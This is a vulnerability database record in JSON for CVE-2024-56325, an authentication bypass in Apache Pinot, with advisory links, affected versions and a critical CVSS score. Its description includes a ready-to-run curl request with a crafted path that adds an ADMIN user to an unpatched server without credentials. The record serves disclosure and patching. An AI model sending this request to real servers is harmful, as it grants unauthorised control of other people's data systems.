{"id":"CVE-2024-56325","details":"Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.","aliases":["GHSA-6jwp-4wvj-6597"],"modified":"2026-03-13T21:48:21.606115Z","published":"2025-04-01T09:15:15.240Z","references":[{"type":"ADVISORY","url":"https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v"},{"type":"ADVISORY","url":"http://www.openwall.com/lists/oss-security/2025/03/27/8"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/apache/pinot","events":[{"introduced":"0"},{"fixed":"c0023da298126af6a01b802a04b66da34ba16134"}],"database_specific":{"versions":[{"introduced":"0"},{"fixed":"1.3.0"}]}}],"versions":["release-0.12.1-rc0"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2024-56325.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}